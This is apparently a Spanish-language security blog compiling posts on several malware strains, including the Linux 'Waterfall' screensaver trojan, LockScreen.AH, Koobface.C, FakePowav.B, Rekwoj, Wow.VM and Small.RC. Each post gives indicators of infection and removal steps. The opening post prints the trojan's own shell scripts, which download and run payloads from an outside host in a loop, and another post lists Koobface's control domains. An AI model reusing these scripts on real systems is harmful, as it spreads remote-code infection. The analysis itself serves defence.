Solo en el caso de que haya instalado el fichero .deb en cuestión y solo en ese caso, abrir un terminal y ejecutar el siguiente comando:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

Este troyano accede al sistema cuando el usuario descarga e instala desde Gnome-Look lo que aparentemente es un salvapantallas con una imagen de una cascada.

Dentro del fichero .deb se encuentra un script con el siguiente código:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Al ser instalado, se descargan otros scripts que al ser ejecutados descargan nuevo código malicioso.

Por ejemplo, el contenido del fichero Auto.bash es el siguiente:

while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done

El objetivo final del troyano es hacer parte al PC infectado de un ataque de denegación de servicio distribuido (DDOS)

Nombre completo: Trojan.LINUX/Waterfall
Tipo: [Trojan] – Caballo de Troya: programa que parece beneficioso o útil pero resulta ser malicioso en algún momento. No se propaga por sí mismo.
Plataforma: [LINUX] – Linux

NOTA: El salvapantallas ha sido eliminado de la web de Gnome-Look.

NOTA: Los ficheros que el troyano descarga desde http://05748.t35.com ya no están disponibles.

Posts relacionados

• No Related Post

Como saber si está infectado con el LockScreen.AH

Tu ordenador se bloquea y para desbloquearse te pide un código que has de pedir por SMS, un SMS premium de coste elevado.

En caso de que aparezcan en tu ordenador los siguientes ficheros:

• axjvk.exe
• csbto.exe
• iunmj.exe
• lpyyi.exe
• mpjwz.exe

Y en el registro de Windows las siguientes claves

• Clave: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• Valor: “windll” = “[ruta y nombre del archivo]“
• Clave: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• Valor: “windll” = “[ruta y nombre del archivo]“

Como eliminar y quitar el LockScreen.AH

Para eliminar el LockScreen.AH hay dos formas:

Primera forma de eliminar el LockScreen.AH

intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.

En caso de que no funcione o no pueda restaurar el sistema, para quitar el LockScreen.AH pruebe lo siguiente:

1. Desactivar temporalmente la Restauración del Sistema.
2. Reiniciar el ordenador a Modo a Prueba de Fallos.
3. Con un antivirus actualizado, borre y ataque todos los archivos infectados.
4. Elimine los archivos explicados en ¿Como saber si está infectado?
5. En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.
6. Edite el registro y elimine los parámetros explicados en ¿Como saber si está infectado?
7. Eliminar archivos temporales
8. Reiniciar el ordenador

Segunda forma de eliminar el LockScreen.AH

Eset ha creado un generador de claves, que permite el acceso al sistema. Para desbloquear el equipo, lo primer es ejecutar el programa descargado, para introducir el numero de 4 digitos que muestra la pantalla en el ordenador que está infectado. Pulsar Generate. Tras ello, el programa generará y mostrará un código que deberemos usar, introduciéndola en la ventana que bloquea al equipo infectado.

Necesitará habilitar el Intérprete de comandos y el editor de Registro.

1. Inicio y Ejecutar
2. Escribir en la venta que se abre la siguiente instrucción:
   reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f
3. Pulsar Aceptar

1. Inicio y Ejecutar
2. Escribir en la ventana, de nuevo, la siguiente instrucción: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableCMD /f
3. Pulsar Aceptar

Descargar el generador de clavesaqui

Posts relacionados

• Listado de programas antivirus reales (1)
• Descargar ESET Smart Security (1)

Este es el caso del Virus Koobface.C. Se trata de un troyano que aprovecha sus funcionalidades de “puerta trasera” para acceder a los datos de diferentes redes sociales mediante las cookies de autenticacion de sitios como:

• hi5.com
• facebook.com
• netlog.com
• twitter.com
• tagged.com
• bebo.com
• myspace.com

La funcionalidad de puerta trasera permite a un usuario remoto realizar las siguientes operaciones en el sistema comprometido:

• Descarga y ejecutar un fichero.
• Abrir una imagen.
• Actualizar el código malicioso.
• Bloquear una dirección IP.
• Poner un mensaje en Twitter, que es lo que hace de este virus la unica forma de auto-expandirse en internet, ya que, de por si mismo, no es capaz de autoreplicarse.

Abre una puerta trasera en el sistema comprometido y se conecta con uno de los siguientes sitios web:

• www.trisem.com/achche
• www.rd040609-cgpay.com/achche
• www.upr0306.com/achche
• www.rjulythree.com/achche
• www.uthreejuly.com/achche
• www.mymegadomain03072009.com/achche

Como saber si se está infectado con el Koobface.C. ¿Como saber si tienes el Koobface.C?

En caso de que aparezcan en tu ordenador los siguientes ficheros:

• %Windir%\twitty[DOS NÚMEROS].exe
• %Windir\%tw[CINCO NÚMEROS].dat

Y en el registro de Windows las siguientes claves

• Clave: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• Valor: “systwtray” = “%Windir%\twitty[TWO DIGIT NUMBER].exe”

Como eliminar y quitar el Koobface.C

Para eliminar el Koobface.C intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.

En caso de que no funcione o no pueda restaurar el sistema, para quitar el FakePowav.B pruebe lo siguiente:

1. Desactivar temporalmente la Restauración del Sistema.
2. Reiniciar el ordenador a Modo a Prueba de Fallos.
3. Con un antivirus actualizado, borre y ataque todos los archivos infectados.
4. Elimine los archivos explicados en ¿Como saber si está infectado?
5. En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.
6. Edite el registro y elimine los parámetros explicados en ¿Como saber si está infectado?
7. Eliminar archivos temporales
8. Reiniciar el ordenador

Posts relacionados

• Virus ‘A tua foto’ (0)
• FakePowav.B (0)
• Tercera variante del Downandup/Conficker: W32 Downandup C (0)
• Hackear facebook, un negocio muy rentable (0)
• Ataques a redes sociales (1)
• Las 10 principales amenazas de seguridad en internet (1)

Microsoft Malicious Software Removal Tool is installed. Click this message to start scanning process or it will start automatically in 10 seconds.

FakePowaw.b. Primera muestra de ataque

Si se realiza el clic o si se agotan los 10 segundos que muestra la pantalla, el siguiente pop-up aparecerá, simulando que realiza operaciones de análisis en el ordenador atacado. Decimos simulando por que el análisis no se lleva a cabo en realidad.

Quick scan in progress. The tool is scanning your computer for prevalent malicious software.

FakePowaw.b Segundo pantallazo

El falso antisoftware malicioso FakePowav.B “encuentra” una serie de infecciones en el equipo atacado:

• Kelogger.Stawin
• Spyware.ActivityKey
• W32.Rinbot.H
• W32.Rinbot.H

FakePowaw.b Pantallazo3

Y te “incita” a adquirir un antivirus con el siguiente mensaje:

The tool can’t remove all malicious software shown in the scan results. Because malicious software is present on your computer, you should use an antivirus product to scan for and remove all malicious software.

Mostrando una ventana donde podrás “comprar” los softwares de antivirus mas famosos del mercado: Norton, McAfee,…

OEM Purchase Center. This service helps keep your computer more secure and up to date with latest software for Windows.

FakePowaw.b Pantallazo de compra

Puedes cerrar la ventana sin comprar, pero aparecerá una burbuja en la barra de tareas inferior donde aparece el siguiente texto:

Security warning. Your computer is infected with malicious software. You should use antivirus product to remove it. Click this message to purchase recommended antivirus software.

FakePowaw.b Burbuja remanente

Sin embargo, en caso de que el atacado sea incauto y se dirija a la compra del software de antivirus, la web que se abrirá será oem-micro-store.com

El troyano FakePowav.B se mostrará con la siguiente pantalla, donde imitará al Windows Security Center, y le mostrará como si el antivirus, la protección contra virus estuviera deshabilitada.

Troyano FakePowav.B Security Center.exe

Como saber si se está infectado con el FakePowav.B. ¿Como saber si tienes el FakePowav.B?

En caso de que aparezcan en tu ordenador los siguientes ficheros:

• Carpeta de Archivos de programas\MalwareRemoval\MalwareRemoval.exe
• Carpeta de Archivos de programas\MalwareRemoval\Security Center.exe
• X:\Windows\Profiles\{nombre de usuario}\Application Data\1\spl.ini
• X:\Windows\Profiles\{nombre de usuario}\Application Data\MalwareRemoval\MalwareRemoval.ini

En caso de manejar otros Windows como el NT, la carpeta de Archivos de Programas podría ser C:\Program Files y en el caso de la carpeta de Application Data C:\WINNT\Profiles\{nombre de usuario}\Application Data

En caso de manejar windows 2000, XP o Server 2003, la carpeta de Aplication Data sería C:\Documents and Settings\{nombre de usuario}\Local Settings\Application Data

Como eliminar y quitar el FakePowav.B

Para eliminar el FakePowav.B intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.

En caso de que no funcione o no pueda restaurar el sistema, para quitar el FakePowav.B pruebe lo siguiente:

1. Desactivar temporalmente la Restauración del Sistema.
2. Reiniciar el ordenador a Modo a Prueba de Fallos.
3. Con un antivirus actualizado, borre y ataque todos los archivos infectados.
4. Elimine los archivos explicados en ¿Como saber si está infectado?
5. En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.
6. Edite el registro y elimine los parámetros explicados en ¿Como saber si está infectado?
7. Eliminar archivos temporales
8. Reiniciar el ordenador

Fuente: Microsoft(+)

Posts relacionados

• Peerfrag.FM (0)
• Virus Koobface.C (1)
• Gusano Alcan (0)
• Gusano Eggdrop.AA (0)
• Tercera variante del Downandup/Conficker: W32 Downandup C (0)
• Las 10 principales amenazas de seguridad en internet (1)
• AVG anuncia la lucha contra Microsoft por el Antivirus gratuito (1)
• Que es Alertvir (0)
• Morro: Antivirus Microsoft Gratis (2)

En caso de que no pueda realizar una restauración del sistema o no funcione el punto de restauracion (se recomienda restaurar, pero en caso de que no pueda restaurar el Sistema Operativo a una versión anterior o no funcione, recomendamos, antes de seguir, deshabilitar la Restauracion del Sistema).

Para eliminar el gusano Rekwoj ha de realizar lo siguiente:

• Reinicie el ordenador en Modo Seguro, en modo A prueba de fallos.
• Pase su Antivirus (en caso de no tener ningun antivirus, no dude en descargar la siguiente versión de prueba de MySecurity Center)
• Elimine los siguientes ficheros que puede encontrar en %Temp%\%Tempfile% (Donde %Temp% es el directorio de archivos temporales de Windows)
  
  • b2e.dll
  • binaries.txt
  • Document.rar
  • Document.bat
• Eliminar todos los archivos temporales del ordenador
• Vaciar la papelera de reciclaje.

En caso de que no se pueda reparar la infección, en caso de no poder borrar los ficheros (es probable que los ficheros estén residentes en memoria) hay que hacer lo siguiente:

• Abrir el Administrador de Tareas (Ctrl + Alt + Supr)
• Buscar Document.bat y pararlo
• Volver al punto de “eliminar los siguientes ficheros que puede encontrar en %Temp%\%Tempfile% (Donde %Temp% es el directorio de archivos temporales de Windows)”
  

Resumen del Gusano Rekwoj

Nombre completo: Trojan.W32/Rekwoj

Tipo: Caballo de Troya. No se propaga solo.

Plataforma: Ejecutable PE (.EXE, .SCR, .DLL) que corre en Windows de 32 bits: 95, 98, Me, NT, 2000, XP, 2003

Alias: Win32/Rekwoj.A o BAT/Rekwoj.A

Posts relacionados

• Registry Optimizer de Aido (0)

Los ataques por uso de codigo malicioso, virus, troyanos y similares son los mas usados para hacerse con las transacciones bancarias a través del acceso para posterior robo de sus bases de datos. Así pues el modus operandi es claro: acceso a los sistemas de instituciones financieras para la obtención de cuentas de correo electrónicos y conseguir hacerse con el control de los usuarios de bancos, muchos mas facil de “timar” que una gran entidad bancaria.

También habló Dmitry Bestuzhev, analista de virus para América Latina de Kaspersky Lab.,

estos ataques son producidos en la impunidad total, ya que en la región, en especial en México, no hay una regulación adecuada para atacar a los delincuentes cibernéticos. Si bien en el país existe una Policía Informática, la Agencia Federal de Investigación (AFI) sólo se concentra en investigar redes de criminales de pornografía infantil que utilizan la Internet, sin considerar que existen otras áreas descuidadas como es el robo de identidad y la sustracción de recursos a través de transacciones bancarias, e incluso, en las nuevas modalidades para robar recursos vía SMS en celulares.

A través del engaño a usuarios desprevenidos los cibercriminales cometen sus fechorías. Mediante supuestos premios obtenidos en concursos, se envían mensajes SMS, diciendo que se ganó un premio, y sólo debe reenviar el mensaje con alguna leyenda. Con ello, los delincuentes roban identidad y el saldo del teléfono celular.

La mayor parte de estos robos se deben, sobre todo, al descuido de los usuarios que carecen de una cultura informática que dejan “abiertas las puertas” a los cyber-delincuentes: son los mas propensos a contestar ataques de phishing, contestar mensajes en los teléfonos moviles y similares.

Números de la ciberdelincuencia

Cada dos segundos se genera un virus malicioso (malware) de toda especie, desde troyanos hasta gusanos y códigos spyware. China es la nación que más genera virus en el mundo, con alrededor de 100 mil virus por día, muchos de los cuales violan la seguridad de los antivirus.

Posts relacionados

• Virus ‘A tua foto’ (0)
• Listado de programas antivirus reales (1)
• Virus Koobface.C (1)
• Kaspersky Internet Security 2010 y Kaspersky Antivirus 2010 (0)
• Osiatis y Kaspersky, unidos bajo la seguridad (0)
• Kaspersky Mobile Security 8.0 (0)
• Descarga Kaspersky Anti-virus para el Windows7 (1)
• Hackear facebook, un negocio muy rentable (0)
• Kaspersky Hosted Security Services (0)
• Que es Alertvir (0)

• Reinicie el ordenador en Modo Seguro, en modo A prueba de fallos.
• Pase su Antivirus (en caso de no tener ningun antivirus, no dude en descargar la siguiente versión de prueba de MySecurity Center)
• Elimine los siguientes ficheros
  • C:\1.HIV
  • C:\2.HIV
  • %UserProfile%\Documentos recientes\LOVE.JPG.LNK (UserProfile es el directorio de trabajo del usuario actual)
  • %UserProfile%\Documentos recientes\SYSTEM32.LNK (UserProfile es el directorio de trabajo del usuario actual)
  • %System%\2.BAT (System es el directorio del sistema de Windows)
  • %Windir%\help\B41346EFA848.EXE (Windir es el directorio de instalación de Windows)
  • %Windir%\help\B41346EFA848.DLL (Windir es el directorio de instalación de Windows)
• Editar el registro de windows:
  • Eliminar la clave del registro:

    HKEY_CLASSES_ROOT\ CLSID\ {1DBD6574-D6D0-4782-94C3-69619E719765}

• Eliminar los archivos temporales del ordenador.
• Vaciar la papelera de reciclaje.

Resumen del Troyano Wow.VM

Nombre completo: Trojan.W32/Wow.VM

Tipo: Troyano. No se propaga solo.

Plataforma: W32 – Ejecutable (.EXE, .SCR, .DLL) que corre en Windows de 32 bits

Alias: Trj/Wow.VM (Panda Security)

Posts relacionados

• Eliminar Exploit.TR, quitar Exploit.TR (0)
• Peerfrag.FM (0)
• Personal Antivirus (19)
• Win32/Gimmiv.A (0)
• Gusano Conficker.A (24)
• Eliminar Redlofs, Quitar el gusano Redlofs (0)
• Como hacer el Windows Vista mas seguro en 10 pasos (0)
• Troyano Small.RC (0)

• Reinicie el ordenador en Modo Seguro, en modo A prueba de fallos.
• Pase su Antivirus (en caso de no tener ningun antivirus, no dude en descargar la siguiente versión de prueba de MySecurity Center)
• Elimine los siguientes ficheros
  • %System%\lncom.exe (System es el directorio del sistema de Windows)
  • %System%\lncom_.exe (System es el directorio del sistema de Windows)
  • %System%\winkey.dll (System es el directorio del sistema de Windows)
  • %System%\reginv.dll (System es el directorio del sistema de Windows)
  • %System%\fservice.exe (System es el directorio del sistema de Windows)
  • %Windir%\ktd32.atm (Windir es el directorio de instalación de Windows)
  • %Windir%\services.exe (Windir es el directorio de instalación de Windows)
  • %Windir%\system\sservice.exe (Windir es el directorio de instalación de Windows)
    
• Editar el registro de windows:
  • Eliminar:

    HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
    DirectX For Windows = "%System%\fservice.exe"

  • Cambiar el registro siguiente que aparezca con:

    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell = Explorer.exe

• Eliminar los archivos temporales del ordenador.
• Vaciar la papelera de reciclaje.

Resumen de Small.RC

Nombre completo: Keylogger.W32/Small.RC   

Tipo: Keylogger.

Plataforma: [W32] – Ejecutable PE (.EXE, .SCR, .DLL) que corre en Windows de 32 bits: 95, 98, Me, NT, 2000, XP, 2003

Alias:TrojanDropper.Small.rc (Quick Heal)

Posts relacionados

• Descargar Anti-keylogger KeyScrambler Gratis (0)
• Hackear facebook, un negocio muy rentable (0)
• Eliminar Redlofs, Quitar el gusano Redlofs (0)
• Troyano Wow.VM o Trojan.W32: Como eliminarlo (1)
• Eliminar Exploit.TR, quitar Exploit.TR (0)